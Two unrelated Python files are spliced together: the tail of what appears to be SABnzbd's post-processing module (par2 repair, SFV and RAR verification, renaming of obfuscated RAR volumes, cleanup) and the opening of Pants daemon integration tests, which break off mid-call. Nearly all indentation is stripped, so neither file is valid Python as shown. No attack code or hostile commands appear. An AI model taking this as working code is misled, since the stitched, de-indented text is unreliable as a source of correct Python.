notifier.send_notification(T("Download Completed"), filename, "complete", nzo.cat)
nzo.status = Status.COMPLETED
else:
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
# Log the overall time taken for postprocessing
postproc_time = int(time.time() - start)
with database.HistoryDB() as history_db:
        # Add the nzo to the database. Only the path, script and time taken are passed
# Other information is obtained from the nzo
history_db.add_history_db(nzo, workdir_complete, postproc_time, script_log, script_line)
# Purge items
history_db.auto_history_purge()
sabnzbd.history_updated()
return True
def prepare_extraction_path(nzo: NzbObject):
"""Based on the information that we have, generate
the extraction path and create the directory.
Separated so it can be called from DirectUnpacker
"""
one_folder = False
marker_file = None
    # Determine category directory
catdir = config.get_category(nzo.cat).dir()
if catdir.endswith("*"):
catdir = catdir.strip("*")
one_folder = True
complete_dir = real_path(cfg.complete_dir.get_path(), catdir)
complete_dir = long_path(complete_dir)
# TV/Movie/Date Renaming code part 1 - detect and construct paths
if cfg.enable_meta():
file_sorter = Sorter(nzo, nzo.cat)
else:
file_sorter = Sorter(None, nzo.cat)
complete_dir = file_sorter.detect(nzo.final_name, complete_dir)
if file_sorter.sort_file:
one_folder = False
complete_dir = sanitize_and_trim_path(complete_dir)
if one_folder:
workdir_complete = create_all_dirs(complete_dir, apply_umask=True)
else:
workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True)
marker_file = set_marker(workdir_complete)
if not workdir_complete or not os.path.exists(workdir_complete):
logging.error(T("Cannot create final folder %s") % os.path.join(complete_dir, nzo.final_name))
raise IOError
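    # Unpack into a temporary "_UNPACK_"-prefixed folder first; process_job renames it
    # to the final name (or to "_FAILED_") once post-processing finishes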
if cfg.folder_rename() and not one_folder:
prefixed_path = prefix(workdir_complete, "_UNPACK_")
tmp_workdir_complete = get_unique_path(prefix(workdir_complete, "_UNPACK_"), create_dir=False)
try:
renamer(workdir_complete, tmp_workdir_complete)
except:
pass # On failure, just use the original name
# Is the unique path different? Then we also need to modify the final path
if prefixed_path != tmp_workdir_complete:
workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1]
else:
tmp_workdir_complete = workdir_complete
return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file
def parring(nzo: NzbObject, workdir: str):
""" Perform par processing. Returns: (par_error, re_add) """
logging.info("Starting verification and repair of %s", nzo.final_name)
par_error = False
re_add = False
# Get verification status of sets
verified = sabnzbd.load_data(VERIFIED_FILE, nzo.admin_path, remove=False) or {}
# If all were verified successfully, we skip the rest of the checks
if verified and all(verified.values()):
logging.info("Skipping repair, all sets previously verified: %s", verified)
return par_error, re_add
if nzo.extrapars:
# Need to make a copy because it can change during iteration
single = len(nzo.extrapars) == 1
for setname in list(nzo.extrapars):
if cfg.ignore_samples() and RE_SAMPLE.search(setname.lower()):
continue
# Skip sets that were already tried
if not verified.get(setname, False):
logging.info("Running verification and repair on set %s", setname)
parfile_nzf = nzo.partable[setname]
                # Check whether the par file still exists, or whether we have more files in this par set
if os.path.exists(os.path.join(nzo.download_path, parfile_nzf.filename)) or nzo.extrapars[setname]:
need_re_add, res = par2_repair(parfile_nzf, nzo, workdir, setname, single=single)
re_add = re_add or need_re_add
verified[setname] = res
else:
continue
par_error = par_error or not res
elif not verified.get("", False):
        # No par2 sets found; skip if this was already tried before
logging.info("No par2 sets for %s", nzo.final_name)
nzo.set_unpack_info("Repair", T("[%s] No par2 sets") % nzo.final_name)
# Try SFV-based verification and rename
sfv_check_result = None
if cfg.sfv_check() and not verified.get("", False):
sfv_check_result = try_sfv_check(nzo, workdir)
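        # Only an explicit SFV failure counts as a par error; None just means no SFV files were found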
par_error = sfv_check_result is False
# If no luck with SFV, do RAR-check or RAR-rename
if sfv_check_result is None and cfg.enable_unrar():
# Check for RAR's with a sensible extension
_, _, rars, _, _ = build_filelists(workdir, check_rar=False)
        # If there are no RARs, they might be super-obfuscated
if not rars:
            # rar_renamer returns the number of renamed RARs
if rar_renamer(nzo, workdir):
# Re-parse the files so we can do RAR-check
_, _, rars, _, _ = build_filelists(workdir)
if rars:
par_error = not try_rar_check(nzo, rars)
# Save that we already tried SFV/RAR-verification
verified[""] = not par_error
if re_add:
logging.info("Re-added %s to queue", nzo.final_name)
if nzo.priority != FORCE_PRIORITY:
nzo.priority = REPAIR_PRIORITY
nzo.status = Status.FETCHING
sabnzbd.NzbQueue.add(nzo)
sabnzbd.Downloader.resume_from_postproc()
sabnzbd.save_data(verified, VERIFIED_FILE, nzo.admin_path)
logging.info("Verification and repair finished for %s", nzo.final_name)
return par_error, re_add
def try_sfv_check(nzo: NzbObject, workdir):
"""Attempt to verify set using SFV file
Return None if no SFV-sets, True/False based on verification
"""
# Get list of SFV names
sfvs = globber_full(workdir, "*.sfv")
    # If no files named *.sfv, let's search for obfuscated SFV files
if not sfvs:
files = globber_full(workdir, "*")
for file in files:
if is_sfv_file(file):
logging.debug("Found and will use obfuscated SFV file: %s", file)
sfvs.append(file)
if not sfvs:
# still no SFV, so:
return None
result = sfv_check(sfvs, nzo, workdir)
if not result:
print_sfv = [os.path.basename(sfv) for sfv in sfvs]
fail_msg = T('Some files failed to verify against "%s"') % "; ".join(print_sfv)
nzo.set_unpack_info("Repair", fail_msg)
nzo.status = Status.FAILED
nzo.fail_msg = fail_msg
return False
# Success
nzo.set_unpack_info("Repair", T("Verified successfully using SFV files"))
return True
def try_rar_check(nzo: NzbObject, rars):
"""Attempt to verify set using the RARs
Return True if verified, False when failed
When setname is '', all RAR files will be used, otherwise only the matching one
If no RAR's are found, returns True
"""
# Sort for better processing
rars.sort(key=functools.cmp_to_key(rar_sort))
# Test
if rars:
setname = setname_from_path(rars[0])
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"), setname)
nzo.set_action_line(T("Trying RAR-based verification"), "...")
try:
# Set path to unrar and open the file
# Requires de-unicode for RarFile to work!
rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND
zf = rarfile.RarFile(rars[0])
# Skip if it's encrypted
if zf.needs_password():
msg = T("[%s] RAR-based verification failed: %s") % (setname, T("Passworded"))
nzo.set_unpack_info("Repair", msg)
return True
# Will throw exception if something is wrong
zf.testrar()
# Success!
msg = T("RAR files verified successfully")
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return True
except rarfile.Error as e:
nzo.fail_msg = T("RAR files failed to verify")
msg = T("[%s] RAR-based verification failed: %s") % (setname, e)
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return False
else:
# No rar-files, so just continue
return True
def rar_renamer(nzo: NzbObject, workdir):
""" Deobfuscate rar file names: Use header and content information to give RAR-files decent names """
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"))
nzo.set_action_line(T("Trying RAR-based verification"), "...")
renamed_files = 0
# This is the most important datastructure (in case of mixed obfuscated rarsets)
rarvolnr = {}
    # rarvolnr maps each rar volume number to the rar filenames and their respective contents (and maybe other characteristics, like file sizes).
# for example: rarvolnr[6]['somerandomfilename.rar']={'readme.txt', 'linux.iso'},
# which means 'somerandomfilename.rar' has rarvolnumber 6, and contents 'readme.txt' and 'linux.iso'
# if we find a rarfile with rarvolnumber 7, and 'linux.iso' in it, we have a match!
# The volume number and real extension of a (obfuscated) rar file
# so volnrext['dfakjldfalkjdfl.blabla'] = (14, 'part014.rar') or (2, 'r000')
    # Not strictly needed, but handy to avoid a second lookup when renaming
volnrext = {}
# Scan rar files in workdir, but not subdirs
workdir_files = os.listdir(workdir)
for file_to_check in workdir_files:
file_to_check = os.path.join(workdir, file_to_check)
# We only want files:
if not (os.path.isfile(file_to_check)):
continue
# The function will check if it's a RAR-file
# We do a sanity-check for the returned number
rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check)
if 0 < rar_vol < 1000:
logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check)
volnrext[file_to_check] = (rar_vol, new_extension)
# The files inside rar file
            rar_contents = rarfile.RarFile(file_to_check, single_file_check=True).filelist()
            if rar_vol not in rarvolnr:
                # does not yet exist, so create:
                rarvolnr[rar_vol] = {}
rarvolnr[rar_vol][file_to_check] = rar_contents # store them for matching (if needed)
else:
logging.debug("No RAR-volume-number found in %s", file_to_check)
logging.debug("Deobfuscate: rarvolnr is: %s", rarvolnr)
logging.debug("Deobfuscate: volnrext is: %s", volnrext)
# Could be that there are no rar-files, we stop
if not len(rarvolnr):
return renamed_files
# Check number of different obfuscated rar sets:
numberofrarsets = len(rarvolnr[1])
if numberofrarsets == 1:
# Just one obfuscated rarset
logging.debug("Deobfuscate: Just one obfuscated rarset")
for filename in volnrext:
new_rar_name = "%s.%s" % (nzo.final_name, volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
else:
        # More than one obfuscated rarset, so we must do matching based on the files inside the rar files
logging.debug("Number of obfuscated rarsets: %s", numberofrarsets)
# Assign (random) rar set names
rarsetname = {} # in which rar set it should be, so rar set 'A', or 'B', or ...
mychar = "A"
        # First things first: assign a rarsetname to the rar files which have volume number 1
for base_obfuscated_filename in rarvolnr[1]:
rarsetname[base_obfuscated_filename] = mychar + "--" + nzo.final_name
mychar = chr(ord(mychar) + 1)
logging.debug("Deobfuscate: rarsetname %s", rarsetname)
# Do the matching, layer by layer (read: rarvolnumber)
# So, all rar files with rarvolnr 1, find the contents (files inside the rar),
# and match with rarfiles with rarvolnr 2, and put them in the correct rarset.
# And so on, until the highest rarvolnr minus 1 matched against highest rarvolnr
for n in range(1, len(rarvolnr.keys())):
logging.debug("Deobfuscate: Finding matches between rar sets %s and %s" % (n, n + 1))
for base_obfuscated_filename in rarvolnr[n]:
matchcounter = 0
for next_obfuscated_filename in rarvolnr[n + 1]:
# set() method with intersection (less strict): set(rarvolnr[n][base_obfuscated_filename]).intersection(set(rarvolnr[n+1][next_obfuscated_filename]))
# check if the last filename inside the existing rar matches with the first filename in the following rar
if rarvolnr[n][base_obfuscated_filename][-1] == rarvolnr[n + 1][next_obfuscated_filename][0]:
try:
rarsetname[next_obfuscated_filename] = rarsetname[base_obfuscated_filename]
matchcounter += 1
except KeyError:
logging.warning(T("No matching earlier rar file for %s"), next_obfuscated_filename)
if matchcounter > 1:
logging.info("Deobfuscate: more than one match, so risk on false positive matching.")
# Do the renaming:
for filename in rarsetname:
new_rar_name = "%s.%s" % (rarsetname[filename], volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
    # Done: the obfuscated rar files have now been renamed to regular, properly formatted filenames
return renamed_files
def handle_empty_queue():
""" Check if empty queue calls for action """
if sabnzbd.NzbQueue.actives() == 0:
sabnzbd.save_state()
notifier.send_notification("SABnzbd", T("Queue finished"), "queue_done")
# Perform end-of-queue action when one is set
if sabnzbd.QUEUECOMPLETEACTION:
logging.info(
"Queue has finished, launching: %s (%s)", sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG
)
if sabnzbd.QUEUECOMPLETEARG:
sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG)
else:
Thread(target=sabnzbd.QUEUECOMPLETEACTION).start()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
def cleanup_list(wdir, skip_nzb):
"""Remove all files whose extension matches the cleanup list,
optionally ignoring the nzb extension
"""
if cfg.cleanup_list():
try:
files = os.listdir(wdir)
except:
files = ()
for filename in files:
path = os.path.join(wdir, filename)
if os.path.isdir(path):
cleanup_list(path, skip_nzb)
else:
if on_cleanup_list(filename, skip_nzb):
try:
logging.info("Removing unwanted file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
if files:
# If directories only contained unwanted files, remove them
cleanup_empty_directories(wdir)
def prefix(path, pre):
"""Apply prefix to last part of path
'/my/path' and 'hi_' will give '/my/hi_path'
"""
p, d = os.path.split(path)
return os.path.join(p, pre + d)
def nzb_redirect(wdir, nzbname, pp, script, cat, priority):
"""Check if this job contains only NZB files,
if so send to queue and remove if on clean-up list
    Returns list of processed NZBs
"""
files = listdir_full(wdir)
for nzb_file in files:
if get_ext(nzb_file) != ".nzb":
return None
# For multiple NZBs, cannot use the current job name
if len(files) != 1:
nzbname = None
# Process all NZB files
for nzb_file in files:
process_single_nzb(
get_filename(nzb_file),
nzb_file,
pp=pp,
script=script,
cat=cat,
priority=priority,
dup_check=False,
nzbname=nzbname,
)
return files
def one_file_or_folder(folder):
""" If the dir only contains one file or folder, join that file/folder onto the path """
if os.path.exists(folder) and os.path.isdir(folder):
try:
cont = os.listdir(folder)
if len(cont) == 1:
folder = os.path.join(folder, cont[0])
folder = one_file_or_folder(folder)
except OSError:
# Can occur on paths it doesn't like, for example "C:"
pass
return folder
TAG_RE = re.compile(r"<[^>]+>")
def get_last_line(txt):
""" Return last non-empty line of a text, trim to 150 max """
# First we remove HTML code in a basic way
txt = TAG_RE.sub(" ", txt)
# Then we get the last line
lines = txt.split("\n")
n = len(lines) - 1
while n >= 0 and not lines[n].strip("\r\t "):
n = n - 1
line = lines[n].strip("\r\t ")
if len(line) >= 150:
line = line[:147] + "..."
return line
def remove_samples(path):
"""Remove all files that match the sample pattern
Skip deleting if it matches all files or there is only 1 file
"""
files_to_delete = []
nr_files = 0
for root, _dirs, files in os.walk(path):
for file_to_match in files:
nr_files += 1
if RE_SAMPLE.search(file_to_match):
files_to_delete.append(os.path.join(root, file_to_match))
# Make sure we skip false-positives
if len(files_to_delete) < nr_files:
for path in files_to_delete:
try:
logging.info("Removing unwanted sample file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
else:
logging.info("Skipping sample-removal, false-positive")
def rename_and_collapse_folder(oldpath, newpath, files):
"""Rename folder, collapsing when there's just a single subfolder
oldpath --> newpath OR oldpath/subfolder --> newpath
Modify list of filenames accordingly
"""
orgpath = oldpath
items = globber(oldpath)
if len(items) == 1:
folder = items[0]
folder_path = os.path.join(oldpath, folder)
if os.path.isdir(folder_path) and folder not in ("VIDEO_TS", "AUDIO_TS"):
logging.info("Collapsing %s", os.path.join(newpath, folder))
oldpath = folder_path
oldpath = os.path.normpath(oldpath)
newpath = os.path.normpath(newpath)
files = [os.path.normpath(f).replace(oldpath, newpath) for f in files]
renamer(oldpath, newpath)
try:
remove_dir(orgpath)
except:
pass
return files
def set_marker(folder):
""" Set marker file and return name """
name = cfg.marker_file()
if name:
path = os.path.join(folder, name)
logging.debug("Create marker file %s", path)
try:
fp = open(path, "w")
fp.close()
except:
logging.info("Cannot create marker file %s", path)
logging.info("Traceback: ", exc_info=True)
name = None
return name
def del_marker(path):
""" Remove marker file """
if path and os.path.exists(path):
logging.debug("Removing marker file %s", path)
try:
remove_file(path)
except:
logging.info("Cannot remove marker file %s", path)
logging.info("Traceback: ", exc_info=True)
def remove_from_list(name, lst):
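    """ Remove the first entry of lst that ends with name (in-place) """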
if name:
for n in range(len(lst)):
if lst[n].endswith(name):
logging.debug("Popping %s", lst[n])
lst.pop(n)
return
def try_alt_nzb(nzo):
""" Try to get a new NZB if available """
url = nzo.nzo_info.get("failure")
if url and cfg.new_nzb_on_failure():
sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
|
test_pantsd_integration.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import itertools
import os
import re
import signal
import threading
import time
import unittest
from textwrap import dedent
import pytest
from pants.testutil.pants_run_integration_test import read_pantsd_log
from pants.testutil.process_test_util import no_lingering_process_by_command
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError("Refusing to touch a non-file.")
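    # Event used by the returned join() closure to tell the toucher loop to stop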
halt = threading.Event()
def file_toucher():
        while not halt.is_set():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
def test_pantsd_compile(self):
with self.pantsd_successful_run_context("debug") as (pantsd_run, checker, _, _):
# This tests a deeper pantsd-based run by actually invoking a full compile.
pantsd_run(["compile", "examples/src/scala/org/pantsbuild/example/hello/welcome"])
checker.assert_started()
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7573")
def test_pantsd_run(self):
extra_config = {
"GLOBAL": {
# Muddies the logs with warnings: once all of the warnings in the repository
# are fixed, this can be removed.
"glob_expansion_failure": "ignore",
}
}
with self.pantsd_successful_run_context("debug", extra_config=extra_config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["list", "3rdparty:"])
checker.assert_started()
pantsd_run(["list", ":"])
checker.assert_running()
pantsd_run(["list", "::"])
checker.assert_running()
# And again using the cached BuildGraph.
pantsd_run(["list", "::"])
checker.assert_running()
# Assert there were no warnings or errors thrown in the pantsd log.
full_log = "\n".join(read_pantsd_log(workdir))
for line in read_pantsd_log(workdir):
# Ignore deprecation warning emissions.
if "DeprecationWarning" in line:
continue
            # Lines beginning with W or E are warning or error lines.
self.assertNotRegex(line, r"^[WE].*", f"error message detected in log:\n{full_log}")
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir("help | head -1", workdir, pantsd_config, shell=True)
self.assertNotIn("broken pipe", run.stderr_data.lower())
checker.assert_started()
def test_pantsd_stacktrace_dump(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
pantsd_run(["-ldebug", "help"])
checker.assert_started()
os.kill(checker.pid, signal.SIGUSR2)
# Wait for log flush.
time.sleep(2)
self.assertIn("Current thread 0x", "\n".join(read_pantsd_log(workdir)))
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
        # Check for no stray pantsd processes.
with no_lingering_process_by_command("pantsd"):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
self.assert_failure(
self.run_pants_with_workdir(
["lint", "testprojects/src/python/unicode/compilation_failure"],
workdir,
pantsd_config,
)
)
checker.assert_started()
# Assert pantsd is in a good functional state.
self.assert_success(self.run_pants_with_workdir(["help"], workdir, pantsd_config))
checker.assert_running()
@pytest.mark.flaky(retries=1) # https://github.com/pantsbuild/pants/issues/6114
def test_pantsd_lifecycle_invalidation(self):
"""Runs pants commands with pantsd enabled, in a loop, alternating between options that
should invalidate pantsd and incur a restart and then asserts for pid consistency."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (["debug", "help"], ["info", "help"])
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run([f"-l{cmd[0]}", cmd[1]])
next_pid = checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
# Run with an env var.
pantsd_run(cmd[1:], {"GLOBAL": {"level": cmd[0]}})
checker.assert_running()
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (["-q", "help"], ["--no-colors", "help"], ["help"])
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(cmd)
next_pid = checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
config_files = [
os.path.abspath(os.path.join(config_dir, f"pants.toml.{i}")) for i in range(2)
]
for config_file in config_files:
print(f"writing {config_file}")
with open(config_file, "w") as fh:
fh.write(f"[GLOBAL]\npants_distdir = \"{os.path.join(dist_dir_root, 'v1')}\"\n")
invalidating_config = os.path.join(config_dir, "pants.toml.invalidates")
with open(invalidating_config, "w") as fh:
fh.write(f"[GLOBAL]\npants_distdir = \"{os.path.join(dist_dir_root, 'v2')}\"\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = [[f"--pants-config-files={f}", "help"] for f in config_files]
pantsd_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 2)):
pantsd_run(cmd)
if not pantsd_pid:
pantsd_pid = checker.assert_started()
else:
checker.assert_running()
pantsd_run([f"--pants-config-files={invalidating_config}", "help"])
self.assertNotEqual(pantsd_pid, checker.assert_started())
def test_pantsd_stray_runners(self):
# Allow env var overrides for local stress testing.
attempts = int(os.environ.get("PANTS_TEST_PANTSD_STRESS_ATTEMPTS", 20))
cmd = os.environ.get("PANTS_TEST_PANTSD_STRESS_CMD", "help").split()
with no_lingering_process_by_command("pantsd"):
with self.pantsd_successful_run_context("debug") as (pantsd_run, checker, _, _):
pantsd_run(cmd)
checker.assert_started()
for _ in range(attempts):
pantsd_run(cmd)
checker.assert_running()
# The runner can sometimes exit more slowly than the thin client caller.
time.sleep(3)
def test_pantsd_aligned_output(self):
# Set for pytest output display.
self.maxDiff = None
cmds = [["goals"], ["help"], ["targets"], ["roots"]]
non_daemon_runs = [self.run_pants(cmd) for cmd in cmds]
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
daemon_runs = [pantsd_run(cmd) for cmd in cmds]
checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print(f"(cmd, run) = ({cmd}, {run.stdout_data}, {run.stderr_data})")
self.assertNotEqual(run.stdout_data, "", f"Empty stdout for {cmd}")
for run_pairs in zip(non_daemon_runs, daemon_runs):
self.assertEqual(*(run.stdout_data for run in run_pairs))
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7622")
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
cmd = ["list", "::"]
pantsd_run(cmd)
checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD")
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
pantsd_run(cmd)
checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
EXPECTED_KEY = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST"
EXPECTED_VALUE = "333"
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
# First, launch the daemon without any local env vars set.
pantsd_run(["help"])
checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
EXPECTED_KEY: EXPECTED_VALUE,
"HERMETIC_ENV": EXPECTED_KEY,
}
with environment_as(**env):
result = pantsd_run(
["-q", "run", "testprojects/src/python/print_env", "--", EXPECTED_KEY]
)
checker.assert_running()
self.assertEqual(EXPECTED_VALUE, "".join(result.stdout_data).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS="33"):
self.assert_success(self.run_pants_with_workdir(["help"], workdir, pantsd_config))
checker.assert_started()
self.assert_failure(
self.run_pants_with_workdir(
["-q", "run", "testprojects/src/python/print_env", "--", "NO_LEAKS"],
workdir,
pantsd_config,
)
)
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = "testprojects/src/python/print_env/main.py"
config = {
"GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'}
}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
touch(test_file)
            # Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = "testprojects/src/python/print_env"
config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
def full_pantsd_log():
return "\n".join(read_pantsd_log(workdir))
# Check the logs.
self.assertRegex(
full_pantsd_log(), r"watching invalidation patterns:.*{}".format(test_dir)
)
checker.assert_running()
# Create a new file in test_dir
with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
time.sleep(10)
checker.assert_stopped()
self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log())
def test_pantsd_invalidation_pants_toml_file(self):
# Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal
tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml")
# Create tmp_pants_toml file
with safe_open(tmp_pants_toml, "w") as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
pantsd_run([f"--pants-config-files={tmp_pants_toml}", "help"])
checker.assert_started()
time.sleep(5)
# Delete tmp_pants_toml
os.unlink(tmp_pants_toml)
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
os.unlink(os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid"))
            # Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
pidpath = os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid")
with open(pidpath, "w") as f:
f.write("9")
            # Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@pytest.mark.flaky(retries=1) # https://github.com/pantsbuild/pants/issues/8193
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
# NB: This doesn't actually run against all testprojects, only those that are in the chroot,
# i.e. explicitly declared in this test file's BUILD.
cmd = ["list", "testprojects::"]
self.assert_success(pantsd_run(cmd))
initial_memory_usage = checker.current_memory_usage()
for _ in range(number_of_runs):
self.assert_success(pantsd_run(cmd))
checker.assert_running()
final_memory_usage = checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
),
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage,
final_memory_usage,
increase_fraction,
max_memory_increase_fraction,
),
)
def test_pantsd_invalidation_stale_sources(self):
test_path = "tests/python/pants_test/daemon_correctness_test_0001"
test_build_file = os.path.join(test_path, "BUILD")
test_src_file = os.path.join(test_path, "some_file.py")
has_source_root_regex = r'"source_root": ".*/{}"'.format(test_path)
export_cmd = ["export", test_path]
try:
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
safe_mkdir(test_path, clean=True)
pantsd_run(["help"])
checker.assert_started()
safe_file_dump(
test_build_file, "python_library(sources=globs('some_non_existent_file.py'))"
)
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_build_file, "python_library(sources=globs('*.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_src_file, "import this\n")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertRegex(result.stdout_data, has_source_root_regex)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory"
test_build_file = os.path.join(test_path, "BUILD")
invalid_symbol = "this_is_definitely_not_a_valid_symbol"
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, f"{invalid_symbol}()")
for _ in range(3):
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(["list", "testprojects::"])
checker.assert_started()
self.assertIn(invalid_symbol, result.stderr_data)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make],
workdir,
